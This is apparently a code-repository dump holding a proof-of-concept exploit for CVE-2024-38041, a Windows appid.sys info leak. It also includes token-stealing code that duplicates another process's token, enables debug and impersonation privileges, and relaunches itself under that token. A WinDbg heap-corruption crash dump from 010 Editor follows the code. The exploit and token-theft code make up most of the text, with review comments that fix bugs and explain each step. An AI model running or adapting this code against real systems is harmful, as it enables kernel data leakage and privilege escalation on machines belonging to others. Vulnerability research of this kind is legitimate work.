    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_opt_ PLARGE_INTEGER AllocationSize,
    _In_ ULONG FileAttributes,
    _In_ ULONG ShareAccess,
    _In_ ULONG CreateDisposition,
    _In_ ULONG CreateOptions,
    _In_reads_bytes_opt_(EaLength) PVOID EaBuffer,
    _In_ ULONG EaLength
    );

typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

typedef VOID(NTAPI* pRtlInitUnicodeString)(
    _Out_ PUNICODE_STRING DestinationString,
    _In_opt_z_ PCWSTR SourceString
    );
423 |
/*
 * Resolved ntdll entry points. Defined (initialised to NULL) in main.c and
 * filled by init_ntdll(); callers assume init_ntdll() succeeded — there is
 * no per-call NULL check anywhere in the visible code.
 */
extern pNtAdjustPrivilegesToken NtAdjustPrivilegesToken;
extern pNtOpenProcessToken NtOpenProcessToken;
extern pNtWriteVirtualMemory NtWriteVirtualMemory;
extern pNtOpenProcess NtOpenProcess;
extern pNtDuplicateToken NtDuplicateToken;
extern pNtSetInformationThread NtSetInformationThread;
extern pNtQueryInformationToken NtQueryInformationToken;
extern pNtClose NtClose;
extern pNtDeviceIoControlFile NtDeviceIoControlFile;
extern pNtCreateFile NtCreateFile;
extern pNtQuerySystemInformation NtQuerySystemInformation;
extern pRtlInitUnicodeString RtlInitUnicodeString;
extern pRtlGetVersion RtlGetVersion;
--------------------------------------------------------------------------------
/Windows/CVE-2024-38041/exploit.c:
--------------------------------------------------------------------------------
1 | #include "Common.h"
2 |
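/*
 * Issue the project's IOCTL (Common.h) on hDevice with no input buffer and
 * `buffer` as the output buffer.
 *
 * hDevice   - handle obtained from NtCreateFile in exploit().
 * buffer    - output buffer the driver fills; must be at least bufferLen bytes.
 * bufferLen - size of buffer in bytes. NtDeviceIoControlFile takes a ULONG,
 *             so a length that does not round-trip through ULONG is rejected
 *             here instead of being silently truncated.
 *
 * Returns 1 on STATUS_SUCCESS, 0 on any failure (the NTSTATUS is printed).
 *
 * Fixes: the InputBufferLength argument was passed as NULL (a pointer
 * constant for a ULONG parameter) — it is now 0; the status was compared
 * against the Win32 NOERROR macro, it is now compared against 0 like the
 * rest of this file.
 */
int SendRequest(HANDLE hDevice, PVOID buffer, size_t bufferLen)
{
    IO_STATUS_BLOCK ioStatus = { 0 };
    ULONG outLen = (ULONG)bufferLen;

    if ((size_t)outLen != bufferLen)
    {
        wprintf(L"[!] Output buffer length does not fit in a ULONG\n");
        return 0;
    }

    NTSTATUS status = NtDeviceIoControlFile(hDevice, NULL, NULL, NULL, &ioStatus,
                                            IOCTL, NULL, 0, buffer, outLen);
    if (status != 0)
    {
        wprintf(L"[!] NtDeviceIoControlFile failed with 0x%X\n", status);
        return 0;
    }

    return 1;
}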
20 |
/*
 * Open \Device\AppID and send one IOCTL whose output buffer is then printed
 * field by field.
 *
 * Returns 0 on success, -1 when the device cannot be opened or the request
 * fails. Depends on the ntdll pointers filled by init_ntdll() and on the
 * BufferOut type and IOCTL constant from Common.h (not shown here).
 *
 * NOTE(review): on the SendRequest failure path the device handle is left
 * open (NtClose is only reached on the success path), and dwBytesReturned
 * is assigned but never read.
 */
int exploit()
{
    NTSTATUS status;
    DWORD dwBytesReturned = 0;
    HANDLE hDevice = NULL;
    UNICODE_STRING deviceName;
    OBJECT_ATTRIBUTES objAttr;
    IO_STATUS_BLOCK ioStatus;
    RtlInitUnicodeString(&deviceName, L"\\Device\\AppID");
    // Six-argument form of the macro from this project's Common.h.
    InitializeObjectAttributes(&objAttr, &deviceName, OBJ_CASE_INSENSITIVE, NULL, NULL, NULL);
    wprintf(L"[^] Trying to open a handle to %ws\n", deviceName.Buffer);
    status = NtCreateFile(&hDevice, GENERIC_READ | GENERIC_WRITE,
        &objAttr, &ioStatus, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0);

    if (status != 0)
    {
        wprintf(L"[!] Failed to open a handle to %ws (NTSTATUS code: 0x%X)\n", deviceName.Buffer, status);
        return -1;
    }

    wprintf(L"[+] Opened a handle successfully %p\n", hDevice);
    wprintf(L"[*] Sending the request to trigger the info leak\n");

    // BufferOut (field0..field5) is declared in Common.h; the %llx format
    // below assumes every field is 64 bits wide — TODO confirm against the header.
    size_t OutputBufferLength = sizeof(BufferOut);
    BufferOut OutputBuffer = { 0 };

    if (SendRequest(hDevice, &OutputBuffer, OutputBufferLength))
    {
        wprintf(L"[+] Sent the request successfully\n");
    }
    else
    {
        wprintf(L"[!] Failed to send the request\n");
        return -1;
    }

    // Narrow printf next to wide wprintf elsewhere; both go to stdout.
    printf("[*] Leaked Data:\nfield0 -> %llx\nfield1 -> %llx\nfield2 -> %llx\nfield3 -> %llx\nfield4 -> %llx\nfiedl5 -> %llx\n",
        OutputBuffer.field0, OutputBuffer.field1, OutputBuffer.field2, OutputBuffer.field3, OutputBuffer.field4, OutputBuffer.field5);

    wprintf(L"[+] Exploit Done!\n");
    NtClose(hDevice);

    return 0;
}
--------------------------------------------------------------------------------
/Windows/CVE-2024-38041/main.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include "Common.h"
6 |
/* Definitions of the ntdll entry points declared extern in Common.h.
 * All start NULL and are filled by init_ntdll(). */
pNtAdjustPrivilegesToken NtAdjustPrivilegesToken = NULL;
pNtOpenProcessToken NtOpenProcessToken = NULL;
pNtOpenProcess NtOpenProcess = NULL;
pNtWriteVirtualMemory NtWriteVirtualMemory = NULL;
pNtDuplicateToken NtDuplicateToken = NULL;
pNtSetInformationThread NtSetInformationThread = NULL;
pNtQueryInformationToken NtQueryInformationToken = NULL;
pNtClose NtClose = NULL;
pNtDeviceIoControlFile NtDeviceIoControlFile = NULL;
pNtCreateFile NtCreateFile = NULL;
pNtQuerySystemInformation NtQuerySystemInformation = NULL;
pRtlInitUnicodeString RtlInitUnicodeString = NULL;
pRtlGetVersion RtlGetVersion = NULL;

/* Pseudo-handles for the calling process (-1) and thread (-2) — the values
 * NtCurrentProcess()/NtCurrentThread() expand to; they need no NtClose. */
HANDLE currentProcessHandle = ((HANDLE)(LONG_PTR)-1);
HANDLE currentThreadHandle = ((HANDLE)(LONG_PTR)-2);

/* Forward declaration; defined after wmain() below. */
void stealToken(HANDLE* duplicateTokenHandleOut, int64_t dwPid);
25 |
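/*
 * Resolve the ntdll exports this program calls into the file-scope function
 * pointers defined above.
 *
 * Returns 1 when ntdll is found and every export resolved, 0 otherwise
 * (a message is printed). Nothing downstream re-checks these pointers, so a
 * single NULL slot would later be called as NULL; every lookup is therefore
 * verified. The original condition joined the negated pointers with "&&",
 * which only reported failure when *all* lookups had failed.
 */
int init_ntdll(void)
{
    HMODULE hNtdll = GetModuleHandleW(L"ntdll");
    if (hNtdll == NULL)
    {
        /* GetLastError() returns a DWORD, hence %lu rather than %d. */
        wprintf(L"[!] Failed to load ntdll.dll! (Error code: %lu)\n", GetLastError());
        return 0;
    }

    RtlGetVersion = (pRtlGetVersion)GetProcAddress(hNtdll, "RtlGetVersion");
    NtAdjustPrivilegesToken = (pNtAdjustPrivilegesToken)GetProcAddress(hNtdll, "NtAdjustPrivilegesToken");
    NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    NtOpenProcessToken = (pNtOpenProcessToken)GetProcAddress(hNtdll, "NtOpenProcessToken");
    NtOpenProcess = (pNtOpenProcess)GetProcAddress(hNtdll, "NtOpenProcess");
    NtDuplicateToken = (pNtDuplicateToken)GetProcAddress(hNtdll, "NtDuplicateToken");
    NtSetInformationThread = (pNtSetInformationThread)GetProcAddress(hNtdll, "NtSetInformationThread");
    NtQueryInformationToken = (pNtQueryInformationToken)GetProcAddress(hNtdll, "NtQueryInformationToken");
    NtClose = (pNtClose)GetProcAddress(hNtdll, "NtClose");
    NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
    NtCreateFile = (pNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile");
    NtDeviceIoControlFile = (pNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile");

    /* Fail when ANY export is missing, not only when all of them are. */
    if (!NtAdjustPrivilegesToken || !NtOpenProcess || !NtDuplicateToken || !NtOpenProcessToken
        || !NtSetInformationThread || !NtQueryInformationToken || !NtClose
        || !NtQuerySystemInformation || !RtlInitUnicodeString || !NtCreateFile
        || !NtDeviceIoControlFile || !RtlGetVersion || !NtWriteVirtualMemory)
    {
        wprintf(L"[!] Failed to resolve ntdll functions\n");
        return 0;
    }

    return 1;
}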
60 |
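/*
 * Re-launch this executable under duplicatedTokenHandle and wait for it.
 *
 * duplicatedTokenHandle - token the child runs under (from stealToken()).
 * dwPid                 - when non-zero the child gets the arguments
 *                         "<dwPid> 0"; when zero it gets no arguments, which
 *                         makes wmain() in the child take its argc-free path.
 *
 * Fixes: the function is void but returned -1 from its error paths; those
 * now simply return after printing. selfPath is MAX_PATH wide but was
 * queried with a hard-coded 100, truncating longer install paths; the real
 * buffer size is used. The GetLastError() DWORD is printed with %lu.
 * Blocks in WaitForSingleObject until the child exits.
 */
void spawnShell(HANDLE duplicatedTokenHandle, int64_t dwPid)
{
    WCHAR selfPath[MAX_PATH] = { 0 };
    WCHAR cmdLine[MAX_PATH] = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    STARTUPINFO si = { 0 };

    if (!GetModuleFileNameW(NULL, selfPath, MAX_PATH)) {
        wprintf(L"Failed to get module file name.\n");
        return;
    }

    if (dwPid != 0)
    {
        if (swprintf_s(cmdLine, MAX_PATH, L"%s %lld 0", selfPath, dwPid) == -1) {
            wprintf(L"ERROR: Failed to format command line.\n");
            return;
        }
    }
    else
    {
        if (wcscpy_s(cmdLine, MAX_PATH, selfPath) != 0) {
            wprintf(L"ERROR: Failed to copy selfPath to cmdLine.\n");
            return;
        }
    }

    // Set up STARTUPINFO: interactive desktop, window shown.
    si.cb = sizeof(si);
    si.lpDesktop = L"Winsta0\\Default";
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;

    // This will fail with ACCESS_DENIED if the local service doesn't have the permissions to access the directory
    BOOL bResult = CreateProcessAsUserW(
        duplicatedTokenHandle,
        NULL,
        cmdLine,
        NULL,
        NULL,
        FALSE,
        0,
        NULL,
        NULL,
        &si,
        &pi
    );

    if (!bResult) {
        wprintf(L"CreateProcessAsUserW failed with error %lu\n", GetLastError());
        return;
    }

    wprintf(L"Process created successfully.\n");
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
}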
118 |
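/*
 * Report whether the current process token belongs to
 * NT AUTHORITY\LOCAL SERVICE.
 *
 * Despite the name, the SID compared is S-1-5-19 (LOCAL SERVICE), not
 * S-1-5-18 (SYSTEM); wmain() prints the LOCAL SERVICE wording, so the name is
 * kept for the existing call site and only the contract is documented here.
 *
 * Returns TRUE only when every step succeeds and the SID matches, FALSE on
 * any failure (a message is printed). Resources are released on every path
 * through a single cleanup tail instead of the repeated free/close pairs.
 * A zero size from the sizing query is also treated as failure so that a
 * zero-length HeapAlloc can never be handed to the second query.
 */
BOOL IsRunningAsSystem(void) {
    HANDLE tokenHandle = NULL;
    PTOKEN_USER pTokenUser = NULL;
    LPWSTR sidString = NULL;
    ULONG dwSize = 0;
    BOOL result = FALSE;
    NTSTATUS status;

    status = NtOpenProcessToken(currentProcessHandle, TOKEN_QUERY, &tokenHandle);
    if (status != 0) {
        wprintf(L"NtOpenProcessToken failed. Status: 0x%x\n", status);
        return FALSE;
    }

    /* First query with a NULL buffer only sizes the result; the expected
     * status for that is STATUS_BUFFER_TOO_SMALL (0xC0000023). */
    status = NtQueryInformationToken(tokenHandle, TokenUser, NULL, 0, &dwSize);
    if (status != 0xC0000023 || dwSize == 0) {
        wprintf(L"NtQueryInformationToken (1) failed. Status: 0x%x\n", status);
        goto cleanup;
    }

    pTokenUser = (PTOKEN_USER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize);
    if (!pTokenUser) {
        wprintf(L"HeapAlloc failed.\n");
        goto cleanup;
    }

    status = NtQueryInformationToken(tokenHandle, TokenUser, pTokenUser, dwSize, &dwSize);
    if (status != 0) {
        wprintf(L"NtQueryInformationToken (2) failed. Status: 0x%x\n", status);
        goto cleanup;
    }

    if (!ConvertSidToStringSidW(pTokenUser->User.Sid, &sidString)) {
        wprintf(L"ConvertSidToStringSidW failed.\n");
        goto cleanup;
    }

    // NT AUTHORITY\LOCAL SERVICE
    result = (_wcsicmp(sidString, L"S-1-5-19") == 0) ? TRUE : FALSE;

cleanup:
    /* sidString / pTokenUser are NULL on the paths that never reached
     * their allocation; guard the frees rather than rely on NULL tolerance. */
    if (sidString) {
        LocalFree(sidString);
    }
    if (pTokenUser) {
        HeapFree(GetProcessHeap(), 0, pTokenUser);
    }
    NtClose(tokenHandle);

    return result;
}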
173 |
/*
 * Entry point. Two modes, selected by the identity of the current token:
 *  - running as LOCAL SERVICE (IsRunningAsSystem): run exploit() and exit
 *    with code 0 regardless of exploit()'s own return value;
 *  - otherwise: require exactly two arguments, parse both with _wtoi,
 *    duplicate the token of the process in argv[1] via stealToken(), then
 *    re-launch this program under that token with argv[2] forwarded
 *    (spawnShell() passes "<pid> 0", so the child loops back through here).
 *
 * Exit codes: -1 init failure or wrong argument count, -2 both PIDs parsed
 * as 0, -3 stealToken() produced no handle, 0 otherwise.
 *
 * NOTE(review): the usage string stops after "%ls " — the argument
 * placeholders appear to have been lost from this listing.
 * NOTE(review): _wtoi() yields 0 for non-numeric text as well as for "0",
 * so the check below only rejects the case where *both* values are 0;
 * dwPid2 == 0 is a legitimate input for spawnShell().
 */
int wmain(int argc, wchar_t* argv[])
{
    if (!init_ntdll())
    {
        return -1;
    }

    if (IsRunningAsSystem()) {
        wprintf(L"The process is running as NT AUTHORITY\\LOCAL SERVICE.\n");
        exploit();
        ExitProcess(0);
    }
    else {
        wprintf(L"The process is not running as NT AUTHORITY\\LOCAL SERVICE.\n");

        if (3 != argc)
        {
            wprintf(L"Usage: %ls ", argv[0]);
            return -1;
        }

        HANDLE duplicatedTokenHandle = NULL;
        int64_t dwPid = 0;
        int64_t dwPid2 = 0;
        dwPid = _wtoi(argv[1]);
        dwPid2 = _wtoi(argv[2]);
        if (!dwPid && !dwPid2)
        {
            wprintf(L"PIDs must be numeric.\r\n");
            return -2;
        }
        wprintf(L"[+] Stealing token from process #%lld.\r\n", dwPid);
        stealToken(&duplicatedTokenHandle, dwPid);
        if (!duplicatedTokenHandle)
        {
            wprintf(L"Token stealing failed.\r\n");
            return -3;
        }
        spawnShell(duplicatedTokenHandle, dwPid2);
    }

    return 0;
}
217 |
/*
 * Duplicate the token of process dwPid as an impersonation token, enable one
 * privilege on the copy, attach it to the current thread, and return the
 * handle through duplicateTokenHandleOut.
 *
 * duplicateTokenHandleOut - receives the duplicated handle; wmain() treats a
 *                           NULL result as failure.
 * dwPid                   - target process id, cast to HANDLE for CLIENT_ID.
 *
 * Error handling goes through CHECK_STATUS (Common.h, not shown); whether it
 * returns or exits on failure is not visible here. The LUID_SE_* constants
 * also come from Common.h and are assumed to be the LowPart of the
 * corresponding privilege LUIDs — confirm against that header.
 *
 * NOTE(review): currentTokenHandle, targetProcessHandle and
 * targetTokenHandle are never closed on any path.
 * NOTE(review): "¤tTokenHandle" in the first NtOpenProcessToken call is a
 * mangled "&currentTokenHandle" (HTML-entity damage in this listing); the
 * variable is declared a few lines above and used again with
 * NtAdjustPrivilegesToken.
 */
void stealToken(HANDLE* duplicateTokenHandleOut, int64_t dwPid)
{
    HANDLE targetProcessHandle = NULL;
    HANDLE duplicatedTokenHandle = NULL;
    HANDLE currentTokenHandle = NULL;
    NTSTATUS Status;
    TOKEN_PRIVILEGES tp;

    Status = NtOpenProcessToken(currentProcessHandle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ¤tTokenHandle);
    CHECK_STATUS(L"NtOpenProcessToken() returned ", Status);

    // Enable the first privilege on our own token. STATUS_NOT_ALL_ASSIGNED
    // (privilege not held) is tolerated; anything else goes to CHECK_STATUS.
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid.HighPart = 0;
    tp.Privileges[0].Luid.LowPart = LUID_SE_DEBUG;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    Status = NtAdjustPrivilegesToken(currentTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL);
    if (Status != STATUS_NOT_ALL_ASSIGNED)
        CHECK_STATUS(L"NtAdjustPrivilegesToken() #1 returned ", Status);

    // Same for the second privilege.
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid.HighPart = 0;
    tp.Privileges[0].Luid.LowPart = LUID_SE_IMPERSONATE;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    Status = NtAdjustPrivilegesToken(currentTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL);
    if (Status != STATUS_NOT_ALL_ASSIGNED)
        CHECK_STATUS(L"NtAdjustPrivilegesToken() #2 returned ", Status);

    DWORD dwDesiredAccess;
    OBJECT_ATTRIBUTES Obja;
    CLIENT_ID ClientId;

    // Open the target with query access only; UniqueThread stays NULL so the
    // CLIENT_ID names a process, not a thread.
    dwDesiredAccess = PROCESS_QUERY_INFORMATION;
    ClientId.UniqueThread = NULL;
    ClientId.UniqueProcess = (HANDLE)(dwPid);
    InitializeObjectAttributes(&Obja, NULL, 0, NULL, NULL, NULL);

    Status = NtOpenProcess(&targetProcessHandle, dwDesiredAccess, &Obja, &ClientId); // Cannot access PPL processes
    CHECK_STATUS(L"NtOpenProcess() returned ", Status);

    HANDLE targetTokenHandle = NULL;

    Status = NtOpenProcessToken(
        targetProcessHandle,
        TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY,
        &targetTokenHandle);
    CHECK_STATUS(L"NtOpenProcessToken() returned ", Status);

    OBJECT_ATTRIBUTES Obja2;
    SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;

    // SQOS for the duplicate: SecurityImpersonation level, no context
    // tracking, not effective-only. Passed as the last macro argument.
    SecurityQualityOfService.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
    SecurityQualityOfService.ImpersonationLevel = SecurityImpersonation;
    SecurityQualityOfService.ContextTrackingMode = FALSE;
    SecurityQualityOfService.EffectiveOnly = FALSE;
    InitializeObjectAttributes(&Obja2, NULL, 0, NULL, NULL, &SecurityQualityOfService);

    Status = NtDuplicateToken(
        targetTokenHandle,
        MAXIMUM_ALLOWED,
        &Obja2,
        FALSE,
        TokenImpersonation,
        &duplicatedTokenHandle);
    CHECK_STATUS(L"NtDuplicateToken() returned ", Status);

    // Third adjust call, this time on the duplicate. The message still says
    // "#1"; a distinct label would make failures easier to attribute.
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid.HighPart = 0;
    tp.Privileges[0].Luid.LowPart = LUID_SE_ASSIGNPRIMARYTOKEN;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    Status = NtAdjustPrivilegesToken(duplicatedTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL);
    if (Status != STATUS_NOT_ALL_ASSIGNED)
        CHECK_STATUS(L"NtAdjustPrivilegesToken() #1 returned ", Status);

    // ThreadImpersonationToken takes a pointer to the HANDLE, hence the
    // address-of and sizeof(HANDLE) length.
    Status = NtSetInformationThread(
        currentThreadHandle,
        ThreadImpersonationToken,
        (PVOID)&duplicatedTokenHandle,
        sizeof(duplicatedTokenHandle));
    CHECK_STATUS(L"NtSetInformationThread() returned ", Status);

    *duplicateTokenHandleOut = duplicatedTokenHandle;
}
--------------------------------------------------------------------------------
/Windows/CVE-2024-38041/readme.md:
--------------------------------------------------------------------------------
1 | # PoC For CVE-2024-38041 (Info Leak)
This exploit targets the appid.sys driver.
3 |
--------------------------------------------------------------------------------
/Windows/Crashdumps/010_editor_crash.txt:
--------------------------------------------------------------------------------
1 | Heap corruption
2 |
3 | 0:000> k
4 | # Child-SP RetAddr Call Site
5 | 00 0000007a`cdf6b090 00007ffd`4a38f393 ntdll!RtlReportFatalFailure+0x9
6 | 01 0000007a`cdf6b0e0 00007ffd`4a398112 ntdll!RtlReportCriticalFailure+0x97
7 | 02 0000007a`cdf6b1d0 00007ffd`4a3983fa ntdll!RtlpHeapHandleError+0x12
8 | 03 0000007a`cdf6b200 00007ffd`4a39e081 ntdll!RtlpHpHeapHandleError+0x7a
9 | 04 0000007a`cdf6b230 00007ffd`4a2bd80f ntdll!RtlpLogHeapFailure+0x45
10 | 05 0000007a`cdf6b260 00007ffd`4a2bb44d ntdll!RtlpAllocateHeap+0x6af
11 | 06 0000007a`cdf6b4b0 00007ffd`4a2af44f ntdll!RtlpAllocateHeapInternal+0xa2d
12 | 07 0000007a`cdf6b5c0 00007ffd`4a2b0b31 ntdll!RtlpAllocateUserBlockFromHeap+0x63
13 | 08 0000007a`cdf6b640 00007ffd`4a2bbeda ntdll!RtlpAllocateUserBlock+0x111
14 | 09 0000007a`cdf6b690 00007ffd`4a2bb3c7 ntdll!RtlpLowFragHeapAllocFromContext+0x88a
15 | 0a 0000007a`cdf6b750 00007ffd`47f0fde6 ntdll!RtlpAllocateHeapInternal+0x9a7
16 | 0b 0000007a`cdf6b860 00007ffc`d2a92cc3 ucrtbase!_malloc_base+0x36
17 | 0c 0000007a`cdf6b890 00007ffc`d29c1671 Qt5Core!QCoreApplication::translate+0x49a23
18 | 0d 0000007a`cdf6b8c0 00007ffc`d27bdd8e Qt5Core!QVariant::QVariant+0x21
19 | 0e 0000007a`cdf6b8f0 00007ffc`d27c0109 Qt5Core!QVariantAnimation::qt_static_metacall+0x111e
20 | 0f 0000007a`cdf6b930 00007ffc`d27c14e0 Qt5Core!QVariantAnimation::interpolated+0x49
21 | 10 0000007a`cdf6b960 00007ffc`d27bb616 Qt5Core!QVariantAnimation::qt_metacast+0x5b0
22 | 11 0000007a`cdf6ba30 00007ffc`d27bbaeb Qt5Core!QAbstractAnimation::setCurrentTime+0xd6
23 | 12 0000007a`cdf6ba80 00007ffc`d8fbe31b Qt5Core!QUnifiedTimer::setSlowdownFactor+0x29b
24 | 13 0000007a`cdf6bc10 00007ffc`d8febf88 Qt5Widgets!QMainWindowLayoutSeparatorHelper::adjustCursor+0x81b
25 | 14 0000007a`cdf6bd00 00007ffc`d8febf35 Qt5Widgets!QDockAreaLayoutInfo::apply+0x1b8
26 | 15 0000007a`cdf6bd80 00007ffc`d8febd5c Qt5Widgets!QDockAreaLayoutInfo::apply+0x165
27 | 16 0000007a`cdf6be00 00007ffc`d901a2f4 Qt5Widgets!QDockAreaLayout::apply+0x4c
28 | 17 0000007a`cdf6be30 00007ffc`d90212b5 Qt5Widgets!QMainWindowLayout::applyState+0x674
29 | 18 0000007a`cdf6bf10 00007ffc`d8f09b3d Qt5Widgets!QMainWindowLayout::setGeometry+0x145
30 | 19 0000007a`cdf6bf90 00007ffc`d8f08b60 Qt5Widgets!QLayoutPrivate::doResize+0xad
31 | 1a 0000007a`cdf6bff0 00007ffc`d8f0b276 Qt5Widgets!QLayout::activate+0x2a0
32 | 1b 0000007a`cdf6c070 00007ffc`d8ef5820 Qt5Widgets!QLayout::widgetEvent+0x56
33 | 1c 0000007a`cdf6c0a0 00007ffc`d8ef48b8 Qt5Widgets!QApplicationPrivate::notify_helper+0xf0
34 | 1d 0000007a`cdf6c0d0 00007ffc`d2986f3a Qt5Widgets!QApplication::notify+0x1878
35 | 1e 0000007a`cdf6c600 00007ffc`d2988ce5 Qt5Core!QCoreApplication::notifyInternal2+0xba
36 | 1f 0000007a`cdf6c670 00007ffc`f390dd5f Qt5Core!QCoreApplicationPrivate::sendPostedEvents+0x215
37 | 20 0000007a`cdf6c730 00007ffc`d29d1587 qwindows!qt_plugin_query_metadata+0x20af
38 | 21 0000007a`cdf6c760 00007ffc`f390dd39 Qt5Core!QEventDispatcherWin32::processEvents+0x67
39 | 22 0000007a`cdf6f8a0 00007ffc`d298307c qwindows!qt_plugin_query_metadata+0x2089
40 | 23 0000007a`cdf6f8d0 00007ffc`d2985f04 Qt5Core!QEventLoop::exec+0x1bc
41 | 24 0000007a`cdf6f930 00007ff7`e3c109c4 Qt5Core!QCoreApplication::exec+0x154
42 | 25 0000007a`cdf6f990 00007ff7`e3d47967 010Editor+0x4009c4
43 | 26 0000007a`cdf6fb00 00007ff7`e3d468e6 010Editor+0x537967
44 | 27 0000007a`cdf6fb90 00007ffd`49067374 010Editor+0x5368e6
45 | 28 0000007a`cdf6fbd0 00007ffd`4a2dcc91 KERNEL32!BaseThreadInitThunk+0x14
46 | 29 0000007a`cdf6fc00 00000000`00000000 ntdll!RtlUserThreadStart+0x21
47 | 0:000> !analyze -v
48 | *******************************************************************************
49 | * *
50 | * Exception Analysis *
51 | * *
52 | *******************************************************************************
53 |
54 |
55 | KEY_VALUES_STRING: 1
56 |
57 | Key : Analysis.CPU.mSec
58 | Value: 703
59 |
60 | Key : Analysis.Elapsed.mSec
61 | Value: 706
62 |
63 | Key : Analysis.IO.Other.Mb
64 | Value: 20
65 |
66 | Key : Analysis.IO.Read.Mb
67 | Value: 1
68 |
69 | Key : Analysis.IO.Write.Mb
70 | Value: 29
71 |
72 | Key : Analysis.Init.CPU.mSec
73 | Value: 3750
74 |
75 | Key : Analysis.Init.Elapsed.mSec
76 | Value: 441258
77 |
78 | Key : Analysis.Memory.CommitPeak.Mb
79 | Value: 178
80 |
81 | Key : Analysis.Version.DbgEng
82 | Value: 10.0.27704.1001
83 |
84 | Key : Analysis.Version.Description
85 | Value: 10.2408.27.01 amd64fre
86 |
87 | Key : Analysis.Version.Ext
88 | Value: 1.2408.27.1
89 |
90 | Key : Failure.Bucket
91 | Value: HEAP_CORRUPTION_c0000374_010Editor.exe!heap_corruption!010Editor.exe
92 |
93 | Key : Failure.Hash
94 | Value: {1b833736-4abe-e70f-202c-45eeab348924}
95 |
96 | Key : Timeline.OS.Boot.DeltaSec
97 | Value: 372657
98 |
99 | Key : Timeline.Process.Start.DeltaSec
100 | Value: 441
101 |
102 | Key : WER.OS.Branch
103 | Value: vb_release
104 |
105 | Key : WER.OS.Version
106 | Value: 10.0.19041.1
107 |
108 | Key : WER.Process.Version
109 | Value: 14.0.1.0
110 |
111 |
112 | NTGLOBALFLAG: 0
113 |
114 | APPLICATION_VERIFIER_FLAGS: 0
115 |
116 | EXCEPTION_RECORD: (.exr -1)
117 | ExceptionAddress: 00007ffd4a38f3c9 (ntdll!RtlReportFatalFailure+0x0000000000000009)
118 | ExceptionCode: c0000374
119 | ExceptionFlags: 00000001
120 | NumberParameters: 1
121 | Parameter[0]: 00007ffd4a3f97f0
122 |
123 | FAULTING_THREAD: 0000352c
124 |
125 | PROCESS_NAME: 010Editor.exe
126 |
127 | ERROR_CODE: (NTSTATUS) 0xc0000374 - A heap has been corrupted.
128 |
129 | EXCEPTION_CODE_STR: c0000374
130 |
131 | EXCEPTION_PARAMETER1: 00007ffd4a3f97f0
132 |
133 | ADDITIONAL_DEBUG_TEXT: Enable Pageheap/AutoVerifer
134 |
135 | STACK_TEXT:
136 | 00000000`00000000 00000000`00000000 010Editor.exe!heap_corruption!010Editor.exe+0x0
137 | 00000000`00000000 00000000`00000000 unknown![~0s]+0x0
138 | 0000007a`cdf6b090 00007ffd`4a38f3c9 ntdll!RtlReportFatalFailure+0x0
139 | 0000007a`cdf6b0e0 00007ffd`4a38f393 ntdll!RtlReportCriticalFailure+0x0
140 | 0000007a`cdf6b1d0 00007ffd`4a398112 ntdll!RtlpHeapHandleError+0x0
141 | 0000007a`cdf6b200 00007ffd`4a3983fa ntdll!RtlpHpHeapHandleError+0x0
142 | 0000007a`cdf6b230 00007ffd`4a39e081 ntdll!RtlpLogHeapFailure+0x0
143 | 0000007a`cdf6b260 00007ffd`4a2bd80f ntdll!RtlpAllocateHeap+0x0
144 | 0000007a`cdf6b4b0 00007ffd`4a2bb44d ntdll!RtlpAllocateHeapInternal+0x0
145 | 0000007a`cdf6b5c0 00007ffd`4a2af44f ntdll!RtlpAllocateUserBlockFromHeap+0x0
146 | 0000007a`cdf6b640 00007ffd`4a2b0b31 ntdll!RtlpAllocateUserBlock+0x0
147 | 0000007a`cdf6b690 00007ffd`4a2bbeda ntdll!RtlpLowFragHeapAllocFromContext+0x0
148 | 0000007a`cdf6b750 00007ffd`4a2bb3c7 ntdll!RtlpAllocateHeapInternal+0x0
149 | 0000007a`cdf6b860 00007ffd`47f0fde6 ucrtbase!_malloc_base+0x0
150 | 0000007a`cdf6b890 00007ffc`d2a92cc3 Qt5Core+0x0
151 | 0000007a`cdf6b8c0 00007ffc`d29c1671 Qt5Core+0x0
152 | 0000007a`cdf6b8f0 00007ffc`d27bdd8e Qt5Core+0x0
153 | 0000007a`cdf6b930 00007ffc`d27c0109 Qt5Core+0x0
154 | 0000007a`cdf6b960 00007ffc`d27c14e0 Qt5Core+0x0
155 | 0000007a`cdf6ba30 00007ffc`d27bb616 Qt5Core+0x0
156 | 0000007a`cdf6ba80 00007ffc`d27bbaeb Qt5Core+0x0
157 | 0000007a`cdf6bc10 00007ffc`d8fbe31b Qt5Widgets+0x0
158 | 0000007a`cdf6bd00 00007ffc`d8febf88 Qt5Widgets+0x0
